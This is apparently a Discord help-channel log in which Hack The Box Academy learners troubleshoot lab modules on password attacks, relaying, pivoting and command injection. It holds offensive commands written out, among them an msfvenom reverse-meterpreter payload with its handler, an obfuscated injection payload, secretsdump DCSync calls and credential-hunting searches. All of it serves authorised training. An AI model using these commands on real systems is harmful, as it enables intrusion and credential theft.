Hey do you wanna try something that may sound silly? Try adding this -o vers=3 im not at my system to check myself
@silent kindle please dont spoil passwords
Admittedly, it was a lesson in persistence. I knew that it was strange from the rip and instead of researching it, I let it go. Hard lesson.
Will be back at my computer after like 30 mins, I will give it a rip
Im just more curious because it is a common roadblock in that assessment
I still have the machine pulled up, I'll get you that feedback. You're talking about using it as an additional option on the mount command?
Yep
https://www.reddit.com/r/netapp/s/cSBqtP04FF this is why im curious
sorry, can I get some help on question 2 on this module https://academy.hackthebox.com/module/147/section/1323. I'm getting this error [CRITICAL] Error during reading the volume: not enough byte read.
on the windows host
Get-FileHash -Algorithm md5 filename.ext (replace with the actual file and extension)
on the linux host
md5sum filename.ext
if they match, then no errors in the transfer
if they don't you'll need to retransfer over
I'm trying to mount the .vhd in linux
i'm aware... this is to check the filehash
to ensure it isn't corrupted :)
Used sudo mount -t nfs <target-IP>:/<target-share> ./tech_support_nfs_share/ -o nolock,vers=3 No change, still bad permissions. I imagine nobody:nobody is a different case than nobody:nogroup. Definitely gonna have to set this one up in the lab
yeah it looks like there's some other stuff going on
¯_(ツ)_/¯
in general though "permission denied" is typically just "sudo to do it"
May I send you a Python code that uses a dictionary attack? I have an error in it and I don't know what it is.
no
Ok, what are the allowed things?
my dms aren't open for rando code review. and it sounds like you're using your code for doing something illegal
I don't use it for education.
well this channel is specifically for help with the learning modules on https://academy.hackthebox.com to access more of the server you'll have to read and follow the list of instructions in #welcome. i also suggest reading the #rules
if i had a nickel for every time someone's tried to use the "for educational purposes" excuse
if you're using it to attack instagram or other things like that: it's illegal
Ok sorry
In any event for some reason, my ntlmrelayx attack doesnt appear to be working in the module even though i followed all the instructions. How many minutes is it expected to take
https://academy.hackthebox.com/module/84/section/809
Srry guys i dont know where to ask this question, combined that i have some channels blocked. But i was doing the FAWN machine and on this question **What is the command we need to run in order to display the 'ftp' client help menu?** i clearly have the answer, searched it many times over but it says its incorrect on all possible formats
I got mine pretty quickly after just a minute or so
Did you drop it to HR or IT-Tools
drop-sc
When I did it I used slinky and responder instead of ntlmrelayx and that worked for me
Im on the third question where I need to relay the hash
Oh my bad yeah I know what you mean then I also had issues with that one. I restarted the machine and just used slinky and then cleaned it, and then I was able to get it using drop-sc.
wait got it to work
Im not sure why it didn't give it to me until I restarted im not sure if you have to clean it for it to give you the next hash or what
oh nice
Relaying is cool as hell dude
hey guys if someone could lend me some hints on assembly module assessment. i was able to write the code to XOR each 8 bytes pushed into the stack memory. i looped through it and got several hex values. what type of answer does htb want? a flag like format?
I had no issues at all with the rest of the lab. I actually thought that lab was really well done. Very thought through.
nvm got it finally
Hi, I'm stuck on the last question here https://academy.hackthebox.com/module/147/section/1327. I'm able to log in into the smb server and get the flag.txt. The issue is that the flag.txt is empty? not sure what to do from here
I don't know why that was happening with you but I faced no such issue. I used mount -t nfs IP:/ target-NFS/ -o nolock and was able to traverse into the mounted share
openvpn
I typed it but like Open VPN
And it didn't respond to it LoL
Then OpenVPN worked
Thank you for your response anyways XD
I have a doubt, where can I find the root flag?
Ohhh, Okay
Can someone give me a hint for password stuffing section of the Password attacks module? I am rather stuck.
Here is the description:
SSH to 10.129.202.64 (ACADEMY-PWATTACKS-NIX01) with user "sam" and password "B@tm@n2022!"
I first looked for any files which might contain the passwords such as in /etc/mysql/ (there were none) and tried to login to the mysql server with sam's credentials and default credentials. Unfortunately, this also didn't work.
@lament oak Sorry to bother you, I have been working on Credential Hunting in Network Shares for a long time and I haven't solved the first problem. If you have solved it, could you share your notes or tell me how to do it?
Hey guys! Question to people who have passed Attacking Enterprise Networks blindly. How did you find the password in the logs on the monitoring.inlanefreight.local host? What was your thought process?
I was getting error while i was doing pass the certificate
Hint: The method you need to use is mentioned on the section page.
Has anyone completed a cobblestone machine ?
Okay bro
its mssql right?
Ligolo ng listener : listener_add --addr 0.0.0.0:30000 --to 127.0.0.1:10000 --tcp
trying to run eternal blue. but cant get rev shell coz of lhost and lport misconfig
what should i set lhost & lport as?
127.0.0.1 & 10000
0.0.0.0 & 10000
Internal-ip & 30000
something else
guys in active directory attacks module's DCSync part, I'm running impacket's secretsdump.py but there's no output
what's the error you getting?
It's just all the traffic to 0.0.0.0, try localhost:10000
on this command-
secretsdump.py -outputfile inlanefreight_hashes -just-dc 'INLANEFREIGHT.LOCAL/adunn@10.129.17.183' -debug
I'm getting this-
Password:
[+] Exiting NTDSHashes.dump() because SAMR SessionError: code: 0xc00000df - STATUS_NO_SUCH_DOMAIN - The specified domain did not exist.
[*] Cleaning up...
np..btw it should work with windows auth
adunn
does that user exist?
yea
It's DNS.
have you modified /etc/hosts
ooh, no. ill do that
There you go.
thanks :)
||echo "ip domain.tld" | sudo tee -a /etc/hosts||
still nothing :(
i think there must be domain controller name
is domain.tld your domain controller?
i think try putting this "INLANEFREIGHT.LOCAL <its ip>"
"One of the easiest things we can do when initially poking around on a Windows host is to get a listing of the directory we are currently working in. We do that with the dir command."
Am I dumb, or why doesn’t it work?
IP and port of the machine where the listener is created. IP of --addr 0.0.0.0:30000 and port should be 30000. Hope that's clear.
Read this: https://arth0s.medium.com/ligolo-ng-pivoting-reverse-shells-and-file-transfers-6bfb54593fa5
What about hidden files/folders?
already tried dir /a & dir /a:h & dir /adh and its not working either
Which module and section is that from?
Introduction to Windows Command Line / System Navigation
nevermind, i found it
still ty for the help
Could anyone help with Password attacks module skills assesment?
I am having a problem with access to the other machines in the internal network they appear unreachable. And i do not know if my config is wrong or what is happening. I already tried the beginning I saw in this write up: https://medium.com/@ravsau00/beyond-phishing-a-multi-stage-attack-to-control-an-active-directory-environment-8d9e7d0c7eb9
solved :) i had to be on the internal network, so used ligolo
Hi am getting this error on the Attacking Enterprise Networks Lateral Movement module
channel 7: open failed: connect failed: Temporary failure in name resolution
<SNIP>
channel 3: open failed: connect failed: Temporary failure in name resolution
channel 4: open failed: connect failed: Temporary failure in name resolution
You need to pivot, you need to make a tunnel to access the internal subnet
Tools like ligolo-ng will make your life a bit easier
Thank you! There was also an answer in the cheat sheet...
didnt work
didnt work either
If you are using metasploit you could probably use a bind payload instead of reverse, if you are having issues with it connecting back to you.
will it work with eternal blue?
Are you running the exploit with metasploit or is it a EB exploit from GitHub?
yup
is there a way to increase timeout? i am getting this
tried set wfsdelay, didnt help
Yeah as long as you use the correct payload and configure things correctly.
i think its working just getting timedout coz of latency of vpn
Which module/section are you working on?
well its not a module i am doing pro labs
This technically belongs in the prolabs channel. I'm on my phone but when I get into work and can look at what you're trying to do a little better.
Glad to hear that
hallo im new member, how to create vps with digital ocean?? thank you
Just thought it was worth posting - currently can't complete the Internal Password Spraying - Linux module. Restarted the machine 4 times now, every time I ssh into the host the lab crashes
This channel is related to modules content only
👀
where to ask about vps installation? thank you
I guess in #hacker-lounge
yes thank you
okay, did it still work or nah?
nope still struggling haha
Hi I have a question regarding use of Kali VM with VPN for academy. When I use my own Kali VM with VPN, I am not able to enumerate properly. The results are different to when I am using Pwnbox.
For example I am doing IPMI in Footprinting module.
This is what I get from my own VM.
not even bind shell?
what exactly you are trying to do?
But when using Pwnbox.. I can get the answer.
Can you please help me fix this issue.
can i dm? maybe
I would suggest changing the region.
Thanks mate.. I will try doing that.. Any other solution like setting up MTU on tun0 ??
to me it just looks like good old vpn issue, is it UDP or TCP?
Is there any way we can check if the VPN i am connected is UDP or TCP?
-> grep "proto" academy_regular.ovpn
Thanks mate.. It is udp protocol. That might be the reason it is dropping packets.
Use tcp.
I don't really know for sure what you actually did there so can't really understand the issue you're facing
can i dm you?
leave me a message and I'll get back to you soon as I am busy elsewhere right now
I am trying to do ctf and i am connected to VPN but its showing slow speed and i cant ping the target, why ?
I am using openvpn btw
windows most prolly
Its a linux target and i am using atch btw
I dont know what to do
Please help me i havent done CTF for 2 days
Hello. I just joined and I haven't done a CTF. Where should I start?
Just watch any walk through of a random easy CTF and you will understand
have I done something wrong with this or does it need to be encoded?
%0a$fin'd'${IFS}${PATH:0:1}$(rev<<<rsu)${PATH:0:1}${rev<<<erahs}${rev<<<c7}gre'p'${ro'o't}${tai'l',-n,1}
https://academy.hackthebox.com/module/109/section/1039
Sounds like a plan. Thanks for that. Where would I find one at?
i need help with these questions from DNS section of Footprinting module
What have you tried so far? You can DM me if you'd like.
Getting started - Alternative method
Hi everyone, can someone explain me how to solve this errors? I have already set the necessary options to run this nibbleblog exploit, i dont know why
i changed it, but it still doesn't work
Can i DM ?
VPN config?
or exploit config?
LHOST set at the IP for tun0 interface, the port set at 4445
What rule
?
Can someone give me a brief description of what topics are being discussed here. Ps Thanks
@bold birch Yes
Its on Attacking Enterprise Networks Lateral Movement
This is from AEN and is over Tier 0. If you are having issues, I recommend asking if anyone is willing to go to DMs to discuss AEN content.
could you be more specific please?
I didn't say I had the time to go to DMs to discuss that. With that being said don't DM unless someone has agreed to it prior.
Hey I've got some time now, you can DM if you are still stuck.
DMed you
Anyone else on US East having VPN problems? My VPN keeps restarting on me please @ with replies
Thanks a lot !
I need some help in shells and payload module, the final machine in that module 'the live engagement'. In that it need to be connected through a RDP but its too slow. is there any way to make it without rdp
pentest in a nutshell
section :windows initial
i am trying to connect to smb through crackmapexec
but when i try to copy the file
i got error reading devs file ; netbios connection with host timeout
i got it multiple times
You can just setup the RDP host as a pivot.
Can you explain it in detail pls.
Can anyone help me with the Credential Hunting in Network Shares part? Please DM me, thanks.
I honestly can't remember if I tried without sudo after finding out what the issue was and how I needed to interact with it after that. If the privileges that you mount the folder with have anything to do with access permissions, this may be why you didn't have any issues.
hellooooo guyssssss
I completed this module before but it was updated so now I have to go back and complete the new parts
thats a yikes moment
I assume going for the cpts ?
Yep, and only have this and AEN left. Same with you?
Get-ChildItem -Path "\\DC01.inlanefreight.local\SHARES" -Include *.ini,*.cfg,*.ps1,*.bat -Recurse -ErrorAction SilentlyContinue | Select-String -Pattern 'passw|cred|initial'
I used this command, and only three shared resources showed output, and the content was very large. I tried some of the passwords in content, but they were all wrong.
yeah expect far behind only completed about 65% and only understand ~30 to 40% once I go for a second round with detailed notes I think Id be ready for the ctps
Please help me, I'm stuck on this for 4 days
What question are you on?
One of the shares mendres has access to contains valid credentials of another domain user. What is their password?
Get-ChildItem -Recurse -Include *.ext \\Server\Share | Select-String -Pattern
Should I run this code? I've reviewed it three or four times, but it always fails with insufficient permissions. When I use it in a place with permissions, the output is incredibly long. Is it because I haven't specified the pattern correctly?
Why don't you use the examples from the module?
Can I DM you?
@winter shard Please take care not to post content from modules above tier 0
Hey Guys in pass the ticket from windows section from password attacks I don't see john's ntlm or his tgt nothing from dumps. Any hint on what I'm missing
Has anyone completed the module LLM Output Attacks? I need some hints for the skills assessment. 🙂
Hey someone have CRTA cert? Is it relevant in the field or not really I’m looking it up
silly one, how would you go about downloading the tools inside C:\tools of the AD Enumeration module? as its 1.25GB which is currently at 150 bytes / s ... yes bytes. it stopped estimating the time to download at around 23h
Get the tools from the source
I know I should compile them myself, I want to take the tools as they currently exist and test against the skills assessment...
Are you using smb?
was transferring over SMB to begin with but switching to SMB
was transferring over RDP*
Yeah that probably why plus the vpn slowness
Hey Everyone 👋
I just finished the hard lab for the enumeration module. I have to say I am very impressed with how they make those labs feel.
Done
If you did follow the instructions, you would be identified now 🙂
I'm not verified yet?? 🤔
No worries, have a great night
This is going to sound however it sounds, I am going for the cpts and just finished footprinting. The next two modules are information gathering and vulnerability assessment. I'm going to be real, often when a course includes information gathering it is a whole lot of theory and memorization instead of hands on doing because of the nature of open source intelligence. As far as vuln assessment goes, I know it is important for the "job" to meet those legal checkboxes for a company, but it isn't exactly enticing to do or read. Long story short, will it hurt me going forward if I skip these two modules in the pentest pathway then come back to them later to finish them as required for the cert? Or are the exercises offered in both modules an interesting and good take on the subject and worth doing immediately?
This isn't really the place for me to explain this in detail, as it technically isn't a requirement for that Skills Assessment and the information I provide may end up adding another element to something you are already learning. I would finish it with the provided content, i.e., the attack box you RDP into and then if you are doing the CPTS path, circle back to this after the Pivoting module and use what you learn in that module to use the RDP host as a pivot host. By that point you should also understand pivoting better, so I would also recommend some self-learning and add ligolo to it for pivoting.
with rubeus you can specify /user:john and the mimikatz one with /extract the username should be at the end
The information gathering module is fairly useful for web stuff. Skipping the vuln assessment (for now) is fine though
Don't let its name fool you
You can compress then transfer
Its what I did if I recall
Hello smart minds, I am new here ...
Glad to join you all
Please any insight or roadmap for a beginner
I will appreciate
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
@narrow rover 👆
Thank you it was the machine fault that I couldn't find johns ekeys
Restarting it and then tried again it worked
But thanks for answering
Is it useful in the OSINT way or is it useful in a different way? Scrolling through the sections I see vhosts, robots.txt, and .Well-Known URIs that has potential to be useful on an actual box not focused on OSINT.
but beyond that, you may have to clue me in on why its important.
Thanks
Yep I recently redid it, so I have it fresh on the brain
Yooo
Its in general useful for stuff for web related stuff. Also, its called "information gathering - web edition" so its gonna focus on web stuff
How to open my genral
Theres instructions in #welcome for linking your account
Hello All, Im super stuck at Web Attacks -> Local File disclosure, where Im just trying to verify the vulnerability exists or not,
<!DOCTYPE email [
<!ENTITY company "Inlane Freight">
]>
but in response im receiving @company;
where Im wrong
Usually its &company; not @company;
@sick stump don't leak passwords
i covered it
oh wait im so dumb
i put a red bar on it not spoiler
You will not reuse the same credentials on a service
wsl --install -d Ubuntu
Downloading: Ubuntu
Installing: Ubuntu
WSL2 is not supported with your current machine configuration.
Please enable the "Virtual Machine Platform" optional component and ensure virtualization is enabled in the BIOS.
Enable "Virtual Machine Platform" by running: wsl.exe --install --no-distribution
For information please visit https://aka.ms/enablevirtualization
Error code: Wsl/InstallDistro/Service/RegisterDistro/CreateVm/HCS/HCS_E_HYPERV_NOT_INSTALLED
Hi guys can anyone help with this error, nested VM is enabled on the virtual box then also I am not able to install ubuntu why is it so?
You didn't block it out in the command line
oh
You dont need to follow the setting up module 100%
ah gotcha thanks
You have winrm access: I suggest getting a list of c:/users/ to speed things along
I am not following that but isn't this is the way to install a distro using wsl
Meterpreter Tunneling & Port Forwarding on the module Pivoting, Tunneling, and Port Forwarding:
Solution to msfvenom segmentation fault while trying to run backupjob.
ubuntu@WEB01:~$ ./backupjob
Segmentation fault (core dumped)
First -
Try to use stageless meterpreter payload -
msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=KALI-IP LPORT=9091 -f elf -o backupjob
Second -
Specify the payload in the payload options
set payload linux/x64/meterpreter_reverse_tcp
It should look like this -
msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=KALI-IP LPORT=9091 -f elf -o backupjob
then after copying to the Pivothost
msfconsole -x "use exploit/multi/handler; set payload linux/x64/meterpreter_reverse_tcp; set lhost 0.0.0.0; set lport 9091; exploit"
BINGO!
Nested virtualization is virtualization within a virtual device... and its a pain
yeah thats the first thing that got to my mind, thanks for the help marcie 🙏 ❤️
so there is no way to do that? there should be right?
Also it says "hyperv not installed" that'd be on your vm
Please guide me what was the difference, why using @ didn't work
Its just how the tag is called
although i solved it
I use the following commands to do that but still the same error
dism.exe /online /enable-feature /featurename:VirtualMachinePlatform /all /norestart
dism.exe /online /enable-feature /featurename:Microsoft-Hyper-V-All /all /norestart
dism.exe /online /enable-feature /featurename:Microsoft-Windows-Subsystem-Linux /all /norestart
Its explained in the reading
Not sure what academy module its related to to where you need to install Ubuntu in a nested vm
I suggest #homelab-sysadm or #1024429874246590575 since it has nothing to do with any of the modules
How do you sync time on HTB pwn box I need it for a module
it's not working with any other distro as well
Theres "faketime" and such
@fathom pendant Small question, is there a way i can interact with an smb server using nxc the same way i can interact with it using smbclient ?
It needs specific time from the DC
Again this has nothing to do with hackthebox academy. I told you a better place to ask so youre not flooding the chat with asking for random help
The same? No, similar? Sure
Look into the nxc docs
i know it can list shares but thats about it
It can do more
ok ima experiment a bit thanks dude 🙏
Im stuck on the kerberos auth I need to get the time to sync is it okay if I DM you @fathom pendant
No, ive never had to do any time sync stuff. So im not familiar enough with the commands, but you can search this chat
It also helps to know the module and section youre working on
It for the AEN https://academy.hackthebox.com/module/163/section/1550
i got a account but I need to do spns for kerberoasting
Ah, I did that module blind
ctrl-f in this channel and search for the keywords like "faketime" or "ntpdate"
The problem is I am using the pwn box and Failed to set ntp: NTP not supported
Then faketime ig
and most of the people doing it have used their own VM
¯_(ツ)_/¯
Figured it out by guessing 🙂
Well i definitely dont recommend guessing lol
trying now, thanks 🙂
hello.
Currently doing Skills Assessment - Password Attacks and stuck on J server, found some admin pass, searched through shares on F and found old pass of h... and files for pass manager. But nothing of that I found can decrypt the files.
Any hints?
https://academy.hackthebox.com/module/236/section/2540
Does anyone know how to fix
[!] Failed to connect to endpoint mapper: Could not connect: [Errno 113] No route to host
I can ping the IP address and lab-LAB-DC-CA
└─$ certipy req -u '*******' -p '**********' -dc-ip 10.129.44.56 -ca lab-LAB-DC-CA -template ESC2 -upn *******
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[!] Failed to connect to endpoint mapper: Could not connect: [Errno 113] No route to host
[!] Use -debug to print a stacktrace
[-] Failed to get dynamic TCP endpoint for 91AE6020-9E3C-11CF-8D7C-00AA00C091BE
[-] Got error: Failed to get DCE RPC connection
[-] Use -debug to print a stacktrace
┌──(kali㉿kali)-[~]
└─$ ping lab-LAB-DC-CA
PING lab.local (10.129.44.56) 56(84) bytes of data.
64 bytes from lab.local (10.129.44.56): icmp_seq=1 ttl=127 time=882 ms
64 bytes from lab.local (10.129.44.56): icmp_seq=2 ttl=127 time=14.2 ms
^C
--- lab.local ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1000ms
rtt min/avg/max/mdev = 14.219/448.146/882.074/433.927 ms
This isn't the correct channel. If this is career related it would be more appropriate in #careers-and-certs
Try adding the -debug to the end
certipy req -u '****l' -p '****' -dc-ip 10.129.44.56 -ca lab-LAB-DC-CA -template ESC2 -upn *** -debug
Certipy v5.0.3 - by Oliver Lyak (ly4k)
usage: certipy [-v] [-h] [-debug] {account,auth,ca,cert,find,parse,forge,relay,req,shadow,template} ...
certipy: error: unrecognized arguments: -debug
That is silly -debug unrecognized ???
Sorry after 6 times
[!] Use -debug to print a stacktrace
[*] Requesting certificate via RPC
[*] Request ID is 64
[*] Successfully requested certificate
Yeah that's wonky. Did you install that tool?
Fun fact hashcat has a mode that can decrypt the file directly
dont say...
I have the hashcat example hashes wiki page saved up
Iirc you may be able to run hashid -m filename to check
bruh, i also have it, but didnt even think hashcat can be used for that file type...
Anyways thanks, just cracked password
doesnt hurt to try ¯_(ツ)_/¯
It feels like a dumb question but.. "Windows Attacks & Defense - Kerberoasting", how do I access the Kali image that has the passwords.txt file for kerberoasting the ticket's hash ? I am connected through my Pwnbox, generated the WS01, but thats a W11 host. Trying to ssh on the IPs of the previous documentation (Windows Attacks & Defense - Overview) but it times out
also nmaped the network of the W11 host but its the only host there
Thx in advance for all help
(accessing the Kali machine is not part of the flag, its part of the doc, but the IPs mentioned dont work)
Ssh to the kali box from the windows host
Hey guys in the Password Attacks module, https://academy.hackthebox.com/module/147/section/1328 for the question "Use the credentials provided to log into the target machine and retrieve the MySQL credentials. Submit them as the answer. (Format: <username>:<password>)"
i need a nudge, i tried to use the default credentials for the mysql service and it just kept saying the password is incorrect
I googled a bit and saw a recommendation to check if the server is running in the first place, and it looks like thats the case but its still not working
any help
same issue, getting a timeout, at least for the 172.16.18.20 IP
Try resetting the machine, changing vpn regions
Theres a default credentials cheat sheet in the module
yah i used it but nothing came up right
Try every possible default credentials you see on the googled table
oh so not the actual table itself from the pip package
You'll need to ssh in then try
There is a GitHub repo i guess that contains some default credentials for the service. Afaik
old school brute force style
It exists in the pip package
Theres only a handful of mysql defaults
Oh well thanks peeps ill try this
so for some reason even though i found the credentials, when i tried to log in with it, it invoked this error
bro whoever this guy is, you're the goat man 🐐
Use -p without an argument
oh lemme try
Or put the password immediately after, no spaces
wait I thought from the footprinting module that was js the creator being lazy to add a space
omg
Its reading the password you tried as the database name
If you read the error
Oh well Another day of learning 
oh yeah you're right
Thanks for the help marcie 🙏
hello, I'm stuck on password attack skill assessment for days, I ssh to DMZ with provided credentials, after searching with limited privilege i found a user credentials for FILE01, also in logs I saw privileged user has been added to DMZ but cant find its credentials or hash anywhere I tried other privilege escalation techniques like cronjobs also nothing. thought may be there's no need to escalate privileges on DMZ and transferred chisel to it and started proxychain to use it as pivot after running nmap scan tried logging into FILE01 with credentials I found on DMZ also didnt work,. any help or hints
The user you have for file01 can be used to find other files
Hey Everyone, currently i'm trying to connect to a target machine from my Workstation through ssh, i typed the command ssh hostname@[IP address] and it still gives me Name or Service are not know, i'm not sure how to fix this
Don't put the ip in brackets
Guys
Also its username@ip not hostname
Ok thanks alot , i got it
Ok I guess not sorry
That's still illegal, and this isnt a hacker for hire server
Alright
If you want to learn legal hacking. Then you can sign up for a hackthebox account and head over to https://academy.hackthebox.com to learn stuff that won't land you in trouble
I tried logging into it with DMZ as pivot with chisel but couldnt i get an error (transport_read_layer:freerdp_set_last_error_ex ERRCONNECT_CONNECT_TRANSPORT_FAILED) I tried using my vm also same output and used the technique described in cheat sheet (ssh -D 9050 user@<DMZ01>) also didnt work, do i need to escalate my privileges on DMZ before pivoting?
Nope no need to escalate before pivoting
I personally used ligolo for pivoting
I will look into it I still havent gone through the pivoting module but I ll figure it out thank you very much for the help I got into so many rabbit holes and I m still in beginning of the assessment
Hi, I'm currently in the Command injection module, testing obfuscation by reversing strings, if I input $(rev<<<'imaohw') i get a listening on [any] 9001 ... response, tried googling and asking gpt, nothing fruitful
Hello folks
I am on the Pivoting Module - Remote/Reverse Port Forwarding with SSH
I know is not asked, but trying to get a proper reverse shell from Windows, following the instructions.
Is that possible? No RDP credentials are provided. But when I scan via proxychains, all ports are closed on Windows
Hi, I need a nudge on the kerberoasting skills assessment. I'm stuck on the second question. So I got a username and a hash but I can't crack it. Is this hash uncrackable or am I doing something wrong? I need the creds to further enumerate the domain.
This might sound rhetorical but after having done the SQL Injection fundamentals, I found that SQLMap kind of overwrites a lot of what I did in that lesson. Are there scenarios in the boxes where you would manually enter the injections instead of just using SQLMap?
Yeah pretty much
can somebody help me on question number 2 on this module https://academy.hackthebox.com/module/147/section/1326. I have the NT hash for admin, but it's not accepting as the answer. I can dm you the hash for admin that I have
The whoami command doesn't connect to your listener before executing the command. You won't see anything in your listener. It'll just run the whoami command when executed.
I had to use victor's creds, duh!
# Module: Attacking Common Services
## Section: Attacking DNS
#### Question: Find all available DNS records for the "inlanefreight.htb" domain on the target name server and submit the flag found as a DNS record as the answer.
I looked into the hint and used the tool as suggested, but I'm not getting any results, is there something wrong with the machine or am I missing something?
any hint? Assess further the web application and submit the name of the database user? - Intro to C2 Operations with Sliver
dm me please
Module: Android Application Static Analysis
Section: Deobfuscating Code
Question: I'm following the section but paranoid-deobfuscate module is not working. The output is like this.
(.venv) PS F:\Tool\paranoid-deobfuscator-2.0.1> python -m paranoid_deobfuscator F:\Mobile\android\apk\htb\myapp_deobfuscate_1\myapp
Traceback (most recent call last):
File "<frozen runpy>", line 198, in run_module_as_main
File "<frozen runpy>", line 88, in run_code
File "F:\Tool\paranoid-deobfuscator-2.0.1\paranoid_deobfuscator_main.py", line 240, in <module>
main(args)
File "F:\Tool\paranoid-deobfuscator-2.0.1\paranoid_deobfuscator_main.py", line 126, in main
deobfuscated = deobfuscator.deobfuscate_strings(
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "F:\Tool\paranoid-deobfuscator-2.0.1\paranoid_deobfuscator\paranoid.py", line 130, in deobfuscate_strings
DeobfuscatorHelper_getString(string_id, chunks)
File "F:\Tool\paranoid-deobfuscator-2.0.1\paranoid_deobfuscator\deobfuscator.py", line 67, in DeobfuscatorHelper_getString
state = DeobfuscatorHelper_getCharAt(index, chunks, state)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "F:\Tool\paranoid-deobfuscator-2.0.1\paranoid_deobfuscator\deobfuscator.py", line 81, in DeobfuscatorHelper_getCharAt
chunk = chunks[int(char_index / MAX_CHUNK_LENGTH)]
~~~~~~^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
IndexError: list index out of range
I've been stuck with this problem for 2 days...
Web attack for some reason lol
Hint is in the question
Hey hey, I have trouble with the logrotate privesc module. I successfully trigger the rotation, using the correct log file, but the payload does not execute at all. Tested with just having it touch a file in /tmp, no success. Any help appreciated.
This is the output of the exploit.
is anyone alive?
yo hack ybk
can anyone help to solve this problem?
Hi Mod, tried again, still not able to reach for the Kali machine (172.16.18.20) from the WS01 machine (ACADEMY-WINATTKDEF-WS01) machine. What else can i try ? Exercise Kerberoasting in the Windows Attacks & Defense module
Read over the Overview and Lab Environment section. It states you either attack from WS001 or the Kali machine. Why would you try to reach the Kali machine from WS001?
you're supposed to target the DC
guys whenever im running bloodhound it is opening neo4j browser thing
not bloodhound
Is your bloodhound binary a browser? neo4j is just a database engine that you can access via a webapp, bloodhound is a totally separate app that accesses that database
I started neo4j using "neo4j console" setup credentials, then in terminal entered bloodhound, but instead of bloodhound's login page it is opening the neo4j browser
yeah so check the binary make sure it's actually bh. maybe reinstall it.
can i dm you the screenshot?
k
because that's what the previous mod told me to do. The Pwnhost also does not have a passwords.txt file to dictionary attack the TGS ticket for the first flag
Hello, I am currently working on the “Using CrackMapExec Skill Assessment.” First, I used --rid-brute to obtain the username list. Then, I planned to use proxychains4 -q nxc ldap 172.16.15.3 -u ./Desktop/testuser -p '' --asreproast aspout, but it keeps showing Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN (Client not found in Kerberos database). I don’t know how to resolve this issue.
Good morning! Could anyone help me pls. with the Logrotate Linux Privesc? I crafted the payload, uploaded and compiled the exploit, forced the rotation, the exploit did its job, but hasn't run the payload / nor printed "Done!" as it should when it runs the payload.
In your user file there should be just usernames not any extra details from using --rid-brute. You can DM me.
Hello, yes, it only contains the username.
The best approach is to look for a machine instead of a module, as the machine based view will give you references to modules which will help you tackle it
The other way around will not make sense, e.g., module -> machine, if you don't understand the above ^
I'm having some issues in the Advanced NTLM Relay Attacks Targeting Kerberos part of the NTLM Relay attacks module, for the second question (RBCD) I have enabled WebDAV on the target, set Responder with HTTP and SMB disabled, run both ntlmrelayx and responder, coerced SQL01$, and then it tells me that the user plaintext$ doesn't exist in LDAP. I have restarted the lab multiple times and last time, SQL01 didn't even start/domain join/wasn't reachable. Am I doing something wrong?
How did you end up with the plaintext$ user in the environment?
well i figured since it was the same user that you use to enable webdav, and because you control it
Try to figure out if it is a user or a machine account, and if its the latter
the $ at the end indicates machine account
If that object doesn't exist in the AD environment, then this is a clear hint that you missed a step
there are no other steps in the module
Actually, there are
i see it now, i dropped it on a lab restart, ty
For the Pass the Certificate section in Password Attacks, is anyone else getting the following error when trying to get the TGT?
Hi all,
I’m doing the File Uploads Attacks skill assessment. I found where the uploaded files go, and the file extension that can run code.
I tried putting code inside an image, and even hiding it in the image’s metadata, but it keeps getting blocked. I guess the site is really strict about only allowing “real” images. Any hints on how to make it accept my file?
Thanks!
Maybe this will help:
https://medium.com/@danieldantebarnes/fixing-the-kerberos-sessionerror-krb-ap-err-skew-clock-skew-too-great-issue-while-kerberoasting-b60b0fe20069
this can help too @vagrant shuttle https://notes.benheater.com/books/active-directory/page/using-faketime-for-ad-hoc-kerberos-authentication
Installing Faketime
sudo apt install faketime
faketime -h
This will run the specified 'program'...
Can you get the CPTS exam free with student sub?
No
You do get access to the path with the student subscription, but the exam has to be bought separately
I have done the path how much will the exam cost
Have a look here: https://academy.hackthebox.com/billing
Thanks 🙂
- Did you install the tool as instructed?
- Did you decompile the app?
I am using this command for chisel : ./chisel client <kali-ip>:4445 R:4444:<Internal-ip-of-target>:445
so when running an exploit what should i set lhost,rhost & lport,rport
hey guys I was stuck in password attack module. In the section of "introduction to password cracking" there was a question "what was the sha1 hash for Academy#2025?". I got the hash for it by entering the command "echo -n Academy#2025 | sha1sum" in the pwn machine of the htb, but the hash submitted by it was shown incorrect
try using website like sha1 generator or smthng
I tried even that but the attempt was failed
i still need help. did you check? ;v
getting no reponse in prolabs
some guy had same issue in posted a message on that post he withdrawed his message
anyone know the answer for my qn
.
Have you tried using the provided workstation to obtain the answer?
Hi
Hi @storm badger
yes I do . but nothing worked out
Are you sure you are copying the value correctly, and have you checked whether the command you run is correct
I can check this out in a few minutes. Go ahead and send me a DM and when I'm available I'll respond.
Hi where can I Ask for help
Related to what?
I‘m Stuck at the USING WEB PROXIES - BURP INTRUDER
I Need to Fuzz for the .html file under the /admin Directory
But is there any chance I can get the .html file without waiting for hours to finish the common.txt list in Burp Suite
Internal Password Spraying - with Linux
Can I get a nudge on getting the username? I've been running this password spray for about an hour and a half lol
you can use ffuf or caido
Thx but how do I get the flag from this Website then?
After finding the correct page, you can visit the page in browser, there should be your flag present
Ok thx I got it now 🤩
Yes. I use 2.0.1 module and decompile the app with apktool. I use
apktool d myapp
and I use python venv module and run python script 'python -m paranoid_deobfuscator F:\Mobile\android\apk\htb\myapp_deobfuscate_1\myapp.
F:\Mobile\android\apk\htb\myapp_deobfuscate_1\myapp is directory that I decompile with apktool.... I don't know what I did wrong..
I got another question to ZAP Scanner, "Once you find the High-Level vulnerability" but when I run the zap Spider I don't get any high levels only low or medium
Got it by myself now :)
guys im stuck on Credential Hunting in Network Shares challenge more than one day maybe 2 days i want help please i did everything and i couldn't find the passwords, any help please
What is the current version of your apktool?
Can you try copying the decompiled folder to the virtual env instead of providing absolute path to see how it reacts?
Or you can decode the value manually by following the instructions under Deobfuscating Manually section.
Hi, I’m stuck on the WP skill assessment. I can’t find any trace of WordPress on the site.
Wpscan doesn’t work and Gobuster can’t find any WP directories. I’ve also manually looked for them.
